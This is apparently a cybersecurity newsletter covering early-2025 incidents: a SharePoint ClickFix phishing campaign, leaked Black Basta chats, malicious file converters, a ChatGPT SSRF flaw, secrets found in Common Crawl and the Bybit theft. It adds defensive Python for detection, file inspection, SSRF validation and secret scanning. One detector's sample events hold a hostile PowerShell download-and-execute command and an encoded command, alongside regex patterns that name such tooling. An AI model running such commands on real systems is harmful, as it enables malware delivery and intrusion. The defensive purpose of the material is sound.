In today’s dynamic cybersecurity landscape, recent incidents from February to March 2025 reveal a growing trend of sophisticated attack methods leveraging trusted platforms and advanced exploitation techniques. Notable cases include a stealthy SharePoint phishing campaign that deploys command-and-control malware through deceptive notifications, alongside emerging tactics that exploit vulnerabilities in widely used systems such as ChatGPT and cloud APIs.
Techniques
SharePoint Phishing Campaign to Deliver Malware
Threat actors are leveraging Microsoft’s SharePoint and Graph API in a stealthy phishing campaign to deploy the Havoc C2 (command-and-control) malware. Researchers at FortiGuard Labs uncovered the scheme, which they describe as a “ClickFix” attack. This social engineering technique manipulates users into executing malicious actions under the guise of troubleshooting or system maintenance, making it particularly deceptive and dangerous.
The initial phishing vector is an email imitating a SharePoint notification, designed to lure recipients into ‘urgently reviewing’ the attached ‘restricted file’. The SharePoint file (crafted Word document) contains a malicious link, which presents an HTML file with a fake error message that tells recipients to copy-paste a PowerShell command into their Windows Terminal. This executes code that retrieves a malicious payload from SharePoint, blending in with standard Microsoft communications. From here, an adversary can deliver malware to the device to perform the next stages of the attack.
This advanced use of legitimate cloud services as a conduit for malware makes the campaign particularly potent. By chaining a trusted application for hosting malware with a trusted channel for C2, the scheme can evade many security filters that would flag unknown domains or direct IP connections. The campaign targeted enterprise Microsoft SharePoint users and demonstrates a high level of sophistication. Defending against such attacks requires strong enterprise endpoint controls, user vigilance and cloud-aware security monitoring that can detect abuse of platform APIs.
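The endpoint-side detection opportunity in a ClickFix chain is the moment the user pastes the command: PowerShell is spawned by an interactive shell, fetches something from a trusted Microsoft host and immediately executes it. The following is an added example (not FortiGuard's or Microsoft's tooling) that scores process-creation events with Sysmon/4688-style fields; the hostnames, users, URLs and the encoded blob in the sample events are constructed placeholders, not indicators from the campaign.

```python
import re

# Constructed sample process-creation events (Sysmon/4688-style fields). Every
# host, user, path and URL below is invented for this example.
SAMPLE_EVENTS = [
    {"ts": "2025-03-04T09:12:31Z", "host": "WS-0142", "user": "CORP\\jdoe",
     "parent_image": "C:\\Program Files\\WindowsApps\\WindowsTerminal.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -w hidden -c \"iex (iwr 'https://contoso-my.sharepoint.com/personal/it_support/Documents/fix.txt' -UseBasicParsing).Content\""},
    {"ts": "2025-03-04T09:15:02Z", "host": "WS-0142", "user": "NT AUTHORITY\\SYSTEM",
     "parent_image": "C:\\Windows\\System32\\svchost.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\ProgramData\\Inventory\\collect.ps1"},
    {"ts": "2025-03-04T09:20:45Z", "host": "WS-0207", "user": "NT AUTHORITY\\SYSTEM",
     "parent_image": "C:\\Windows\\System32\\svchost.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command \"Invoke-WebRequest -Uri 'https://contoso.sharepoint.com/sites/IT/Shared%20Documents/agent.msi' -OutFile C:\\Temp\\agent.msi\""},
    {"ts": "2025-03-04T09:31:10Z", "host": "WS-0311", "user": "CORP\\asmith",
     "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     # the base64 blob is a constructed placeholder and is never decoded here
     "command_line": "powershell.exe -NoP -NonI -Enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA="},
]

# Parents that mean a human typed or pasted the command (Run dialog, Terminal).
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
FETCH = re.compile(r"\b(?:iwr|invoke-webrequest|invoke-restmethod|irm|downloadstring|"
                   r"downloadfile|net\.webclient|curl|start-bitstransfer)\b", re.I)
EXEC = re.compile(r"\biex\b|\binvoke-expression\b|(?:^|\s)-(?:enc|encodedcommand|e)\b", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
URL_HOST = re.compile(r"https?://([^\s'\"/:]+)", re.I)
# Microsoft-hosted domains the campaign abuses for staging; legitimate traffic
# to them is common, so they only add weight, never alert on their own.
TRUSTED_CLOUD = ("sharepoint.com", "graph.microsoft.com", "onedrive.live.com", "1drv.ms")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons) for a PowerShell process-creation event, else None."""
    if basename(ev["image"]) not in POWERSHELL:
        return None
    cmd = ev["command_line"]
    reasons = []
    if basename(ev["parent_image"]) in INTERACTIVE_PARENTS:
        reasons.append("spawned from an interactive shell (typed or pasted by the user)")
    if FETCH.search(cmd):
        reasons.append("downloads content from the network")
    if EXEC.search(cmd):
        reasons.append("executes fetched or encoded content")
    hosts = [h.lower() for h in URL_HOST.findall(cmd)]
    if any(h == d or h.endswith("." + d) for h in hosts for d in TRUSTED_CLOUD):
        reasons.append("fetches from a trusted Microsoft cloud host")
    if HIDDEN.search(cmd):
        reasons.append("runs with a hidden window")
    return len(reasons), reasons


def detect_clickfix(events, threshold=3):
    """Alert on events whose combined indicators reach the threshold."""
    alerts = []
    for ev in events:
        scored = score_event(ev)
        if scored is None:
            continue
        score, reasons = scored
        if score >= threshold:
            alerts.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                           "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_clickfix(SAMPLE_EVENTS):
        print(f"[{alert['ts']}] {alert['host']} {alert['user']} score={alert['score']}")
        for reason in alert["reasons"]:
            print("   -", reason)
```

Only the first event alerts: the inventory script and the deployment pull from SharePoint score too low, which is the point of weighting indicators rather than blocking the domain, and the encoded command from explorer.exe stays below threshold but is worth a lower-severity hunt. Feed it real Sysmon Event ID 1 records by mapping ParentImage, Image and CommandLine onto the field names used here.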
‘BlackBastaGPT’ – Chatbot Trained on APT Chat Logs
Cybersecurity researchers at threat intelligence firm Hudson Rock have introduced BlackBastaGPT, a ChatGPT-powered analysis tool. The tool is trained on over a million internal messages leaked from the Black Basta ransomware gang in the wake of a major data breach in February 2025 that exposed the gang’s private chat logs. The underlying leak was attributed to an individual using the alias “ExploitWhispers,” who unveiled an extensive trove of technical and organisational details from Black Basta. The chats reveal an illicit enterprise mirroring a corporate structure. The leaked messages expose the gang’s methodology, including discussions of exploits targeting known vulnerabilities in Citrix, Ivanti, and Fortinet systems. They also used phishing lures posing as IT support to deploy malware like Cobalt Strike and SystemBC. Notably, the logs contained a large number of ZoomInfo lookup links used for reconnaissance. This indicates the gang researched victims’ company size and revenue to better tailor their extortion demands.
BlackBastaGPT has transformed raw intelligence into an interactive resource for cybersecurity professionals. Queries reveal the gang heavily favours exploiting unpatched VPN and RDP servers. It confirms that Qakbot and Cobalt Strike are staple tools, and highlights the experimental use of newer payloads like Brute Ratel to evade detection. The logs also contain financial discussions detailing how ransoms are laundered and split among affiliates.
By leveraging generative AI to parse and index 13 months of Black Basta’s internal chat logs, cybersecurity researchers have gained a unique insight into the inner workings of this group, learning the adversary’s playbook in depth.
FBI Warns Against Online File Converter Tools
The FBI Denver Field Office has released a statement warning of increasing numbers of reports of free online document conversion tools being used to load malware onto victims’ computers, leading to ransomware and data theft. It reports that these tools will almost always complete the task as advertised, but the resulting file download will contain loaders for malware ranging from infostealers to banking/crypto trojans and post-exploitation tools such as Cobalt Strike. Not only may these file converter tools install malicious software, but the uploaded documents may be scraped for sensitive personal information, passwords, and banking or cryptocurrency information.
A cybersecurity researcher well known for tracking infections of ‘Gootloader’, a sophisticated JavaScript-based malware family, identified a Google advertising campaign promoting fake file converter sites in November of last year. Because of the way Google displays ad results, these links often appear at the top of search results, so less savvy users may follow them and unknowingly infect their devices. It is recommended never to use online file conversion tools and, if absolutely necessary, to inspect and scan the files they return, and never to run any executables or JavaScript files obtained from untrusted sources on the web.
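The advice to inspect what a converter hands back can be turned into a concrete check: a file that claims to be a PDF but starts with a PE header, a "document" with a second extension, or a .docx container that is really a zip holding a script are all cheap to spot before anything is opened. This added example (not FBI tooling, nor the researcher's Gootloader tracker) sniffs leading bytes and archive contents; every sample file in it is constructed in memory.

```python
import io
import zipfile

# Leading bytes that identify common document and executable formats.
MAGIC = [
    (b"%PDF-", "pdf"),
    (b"PK\x03\x04", "zip"),                            # also .docx/.xlsx/.pptx containers
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),      # legacy .doc/.xls
    (b"{\\rtf", "rtf"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpg"),
    (b"MZ", "exe"),                                    # Windows PE
    (b"\x7fELF", "elf"),
]
# What a file with this extension should look like on the inside.
EXPECTED_KIND = {"pdf": "pdf", "docx": "zip", "xlsx": "zip", "pptx": "zip", "zip": "zip",
                 "doc": "ole", "xls": "ole", "rtf": "rtf", "png": "png", "jpg": "jpg", "jpeg": "jpg"}
OOXML = {"docx", "xlsx", "pptx"}
# Extensions Windows will execute or hand to a script host on double-click.
RUNNABLE_EXT = {"exe", "scr", "com", "pif", "msi", "bat", "cmd", "ps1",
                "js", "jse", "vbs", "vbe", "wsf", "hta", "lnk"}


def sniff_kind(data):
    """Classify a file by its leading bytes, ignoring the name entirely."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def inspect_download(filename, data):
    """Return a list of findings; an empty list means nothing looked wrong."""
    findings = []
    exts = filename.lower().split(".")[1:]
    final = exts[-1] if exts else ""
    if final in RUNNABLE_EXT:
        findings.append(f"runnable extension .{final}")
    if len(exts) >= 2 and exts[-2] in EXPECTED_KIND and final in RUNNABLE_EXT:
        findings.append(f"double extension .{exts[-2]}.{final} disguises a runnable file as a document")
    kind = sniff_kind(data)
    expected = EXPECTED_KIND.get(final)
    if expected and kind != expected:
        findings.append(f"content is {kind}, not {expected} as .{final} implies")
    if kind in ("exe", "elf") and final not in RUNNABLE_EXT:
        findings.append("native executable hidden behind a non-executable extension")
    if kind == "zip":
        try:
            names = zipfile.ZipFile(io.BytesIO(data)).namelist()
        except zipfile.BadZipFile:
            findings.append("zip container is malformed")
            names = []
        if final in OOXML and "[Content_Types].xml" not in names:
            findings.append(f".{final} lacks the [Content_Types].xml part every Office document has")
        for name in names:
            if name.lower().rsplit(".", 1)[-1] in RUNNABLE_EXT:
                findings.append(f"archive member {name} is runnable")
    return findings


def _zip_bytes(members):
    """Build a zip archive in memory from {name: bytes} (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, payload in members.items():
            zf.writestr(name, payload)
    return buf.getvalue()


# Constructed sample downloads: the first two are what a genuine converter
# returns, the rest imitate the swaps described in the FBI warning.
SAMPLE_DOWNLOADS = {
    "report.pdf": b"%PDF-1.7\n% constructed minimal sample\n",
    "genuine.docx": _zip_bytes({"[Content_Types].xml": b"<Types/>", "word/document.xml": b"<w:document/>"}),
    "invoice.pdf.exe": b"MZ\x90\x00" + b"\x00" * 60,
    "statement.pdf": b"MZ\x90\x00" + b"\x00" * 60,
    "converted.docx": _zip_bytes({"converted.js": b"// constructed", "readme.txt": b"open me"}),
}

if __name__ == "__main__":
    for name, data in SAMPLE_DOWNLOADS.items():
        print(name, "->", inspect_download(name, data) or "no findings")
```

A magic-byte check is a first filter, not a verdict: a real PDF or OOXML file can still carry malicious macros or JavaScript, which is why scanning with an antivirus engine and refusing to run scripts from the web remain the recommendation.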
Happenings
[Global] Google Embraces Browser Fingerprinting as Cookies Wane
In late 2024, Google announced advertising partners would be permitted to employ fingerprinting techniques from February 16, 2025. Instead of blocking all tracking cookies and potentially losing advertising capabilities, Google has sanctioned an alternative tracking method where users may be identified by their device attributes.
Browser fingerprinting involves gathering a collection of a user’s device and browser characteristics such as operating system, screen resolution, installed fonts, browser plugins, and IP address to create a unique identifier. Unlike cookies, which users can delete or block, a fingerprint is largely outside a user’s control and can persist across browsing sessions. Google itself once acknowledged this practice “subverts user choice and is wrong”, since users cannot reset their fingerprint as they would a cookie. Despite the earlier stance, the newly updated policy means Google’s advertising ecosystem can leverage fingerprints to continue tracking individuals even if cookies are refused. The decision has raised alarms among privacy advocates, as it erodes user agency in favour of advertiser interests.
[US] Year-Old ChatGPT Vulnerability Exploited in Attacks on US Government
Security researchers have observed threat actors actively exploiting a server-side request forgery (SSRF) vulnerability in ChatGPT to attack organisations. The flaw (CVE-2024-27564) exists in a component of the ChatGPT service (pictureproxy.php) and was initially reported in 2023. The vulnerability allows an attacker to inject an arbitrary URL into the request parameter, causing the ChatGPT application server to make unintended requests and giving an attacker the ability to leverage ChatGPT’s backend to access external or internal resources via crafted malicious links. The vulnerability does not require authentication, and adversaries have recently been attempting to exploit it in the wild.
The campaign is primarily targeting the U.S. government and financial sector with the majority of the attack traffic directed at U.S.-based systems. There were also attempts noted against financial and healthcare organisations in countries such as Germany, Thailand, Indonesia, Colombia, and the UK, suggesting a broad but strategically weighted operation. This shows the importance of patching web application flaws even if they seem niche. Organisations using ChatGPT integrations should ensure the latest patches are applied and monitor for unusual outbound requests from these services.
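The defect class here, a proxy that fetches whatever URL it is handed, is fixed the same way regardless of the application: restrict scheme and port, resolve the hostname and refuse anything that lands on a loopback, link-local, private or otherwise non-public address. The following is an added example of that validation layer; it is not OpenAI's code and does not describe how pictureproxy.php was patched. The hostnames are invented, `resolver` is injectable so the checks run offline, and `fetch` is a caller-supplied callable that must not follow redirects.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}            # an image proxy never needs other ports
# Carrier-grade NAT space (RFC 6598); not covered by is_private on older Pythons.
SHARED_ADDRESS_SPACE = ipaddress.ip_network("100.64.0.0/10")


def is_public_address(ip_str):
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(ip_str)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                # ::ffff:127.0.0.1 is still loopback
    if ip.version == 4 and ip in SHARED_ADDRESS_SPACE:
        return False
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def resolve_all(hostname):
    """Every address the name resolves to; one public and one private is still a rejection."""
    return sorted({info[4][0] for info in socket.getaddrinfo(hostname, None)})


def validate_outbound_url(url, resolver=resolve_all):
    """Return (ok, reason). Rejects anything a proxy should never fetch on a caller's behalf."""
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parsed.scheme!r} not allowed"
    if parsed.username or parsed.password:
        return False, "credentials in URL"
    host = parsed.hostname
    if not host:
        return False, "missing host"
    try:
        port = parsed.port
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        addrs = resolver(host)
    except (OSError, ValueError):
        return False, "hostname does not resolve"
    if not addrs:
        return False, "hostname does not resolve"
    for addr in addrs:
        if not is_public_address(addr):
            return False, f"{host} resolves to non-public address {addr}"
    return True, "ok"


def proxy_fetch(url, fetch, resolver=resolve_all):
    """Fetch on behalf of a client only after validation; `fetch` must not follow redirects."""
    ok, reason = validate_outbound_url(url, resolver)
    if not ok:
        raise ValueError(f"refusing to proxy {url}: {reason}")
    return fetch(url)


if __name__ == "__main__":
    # Literal addresses resolve without network access, so this runs offline.
    for candidate in ("http://127.0.0.1/", "http://169.254.169.254/", "http://[::1]/",
                      "file:///etc/hosts", "http://10.0.0.5:8080/"):
        print(candidate, "->", validate_outbound_url(candidate))
```

Two caveats a reviewer would raise: redirects must be re-validated hop by hop (or disabled, e.g. `requests.get(url, allow_redirects=False, timeout=5)` as the `fetch`), and because the name is resolved once here and again by the HTTP client, a DNS-rebinding attacker can answer differently each time; production code should connect to the address it validated and send the hostname in the Host header. Outbound-egress monitoring for the proxy's service account, as the paragraph above recommends, catches what the validator misses.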
[Global] 12,000 API Keys Found in AI Training Data Expose Coding Lapses
Security researchers at Truffle Security have uncovered nearly 12,000 API keys, credentials, and passwords inadvertently included in a popular AI training dataset. The secrets were found in the Common Crawl corpus, which holds petabytes of data collected over 12 years of web crawling. The data is frequently used to train large language models (LLMs) for tech firms including OpenAI, Google, and Meta. Truffle Security used its TruffleHog secret-scanning tool to sift through 400 TB of Common Crawl’s December 2024 data (covering around 2.67 billion web pages) and identified 11,908 unique secrets that were still valid. These credentials, embedded in publicly accessible web pages and code, range from cloud platform keys to online service API tokens. The discovery highlights how insecure coding practices can bleed into AI datasets, potentially feeding sensitive information into AI models.
Exposed to the wild, an attacker scanning for leaked keys could hijack them to access cloud resources, steal data, send fraudulent emails, or impersonate brands. Leaked API tokens allow unauthorised access to services and databases, leading to breaches or data exfiltration. Upon discovering the issue, Truffle Security notified the affected platforms, and many of the compromised keys were promptly revoked or rotated, reducing the exposure. This shows that companies building LLMs need even more robust data sanitisation to filter out confidential information, and that developers must adopt safer secret management to avoid accidentally leaking secrets to the entire internet.
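The same detection logic applies on both sides of this story: a dataset curator filtering crawled pages and a developer running a pre-commit hook are both looking for well-known key prefixes plus high-entropy strings sitting in assignments. This added example (not TruffleHog, and far smaller) shows the two-stage approach, format regexes for known providers and a Shannon-entropy filter on generic `name = "value"` matches so placeholders do not drown real findings; the page fragment it scans is constructed, and the AWS key in it is Amazon's documented example key, not a live credential.

```python
import math
import re

# Stage 1: formats with a recognisable prefix. Stage 2 ("generic_assignment")
# catches anything assigned to a secret-looking name and is filtered by entropy.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?P<v>(?:AKIA|ASIA)[0-9A-Z]{16})\b"),
    "github_token": re.compile(r"\b(?P<v>ghp_[A-Za-z0-9]{36})\b"),
    "slack_token": re.compile(r"\b(?P<v>xox[baprs]-[0-9A-Za-z-]{10,})\b"),
    "google_api_key": re.compile(r"\b(?P<v>AIza[0-9A-Za-z_-]{35})\b"),
    "generic_assignment": re.compile(
        r"(?i)\b(?:api[_-]?key|secret|token|password)\b\s*[:=]\s*['\"](?P<v>[^'\"\s]{16,})['\"]"),
}


def shannon_entropy(s):
    """Bits of entropy per character; random keys score near log2(alphabet size)."""
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def mask(secret):
    """Keep just enough of the value to find it in the source without re-leaking it."""
    return secret[:4] + "*" * (len(secret) - 8) + secret[-4:]


def scan_text(text, min_entropy=3.5):
    """Return findings as dicts (kind, line, masked, entropy), deduplicated by value."""
    findings, seen = [], set()
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS.items():
            for match in pattern.finditer(line):
                secret = match.group("v")
                entropy = shannon_entropy(secret)
                if kind == "generic_assignment" and entropy < min_entropy:
                    continue            # "AAAAAAAA..." style placeholders
                if secret in seen:
                    continue
                seen.add(secret)
                findings.append({"kind": kind, "line": line_no,
                                 "masked": mask(secret), "entropy": round(entropy, 2)})
    return findings


# Constructed sample: an inline script block and a settings file as a crawler
# would see them on a public page. AKIAIOSFODNN7EXAMPLE is AWS's documented
# example key; the other values are made up for this example.
SAMPLE_PAGE = """\
<script>
  // constructed sample: configuration left in a public page's inline JavaScript
  var cfg = { aws_key: "AKIAIOSFODNN7EXAMPLE", region: "us-east-1" };
  const GH_TOKEN = "ghp_A1b2C3d4E5f6G7h8I9j0K1l2M3n4O5p6Q7r8";
</script>
# constructed sample: settings file committed to a public repository
api_key = "q7Rv2xLz9PbN4kHd8TwY3sMf6JcG1eKa"
password = "changeme"
secret = "AAAAAAAAAAAAAAAAAAAAAAAA"
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE_PAGE):
        print(f"line {f['line']:>3}  {f['kind']:<20} {f['masked']}  entropy={f['entropy']}")
```

What this does not do is the step that produced the "still valid" figure in the article: TruffleHog verifies candidates against the issuing provider, which is what separates a dead key from a live one. On the developer side the same scanner wired into a pre-commit hook stops the secret before it reaches a public repository, and the masking keeps the scanner's own output from becoming a second leak.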
[AE] Largest ever Crypto Exchange Theft Attributed to North Korean APT
Dubai-based cryptocurrency exchange Bybit suffered a theft of 400,000 Ethereum tokens, which equates to roughly $1.3 billion NZD worth of digital assets, making this the largest crypto exchange hack on record. Bybit moved quickly to restore customer funds, securing emergency replacement of the lost Ethereum within 72 hours. Blockchain analysis firms traced the stolen funds to wallets associated with the Lazarus group, a state-sponsored North Korean hacking team known for crypto theft operations. The FBI later confirmed North Korea’s involvement, codenaming the activity “TraderTraitor” and attributing the Bybit hack to cyber actors from the Democratic People’s Republic of Korea (DPRK), which aligns with past Lazarus exploits.
The attackers demonstrated sophisticated laundering operations to cash out the crypto haul. According to an FBI advisory, the thieves rapidly converted large portions of the Ethereum into Bitcoin and dispersed the funds across thousands of blockchain addresses. This complex web of transactions is designed to obfuscate the money trail and thwart tracking efforts, and it is likely that none of the cryptocurrency will be recoverable.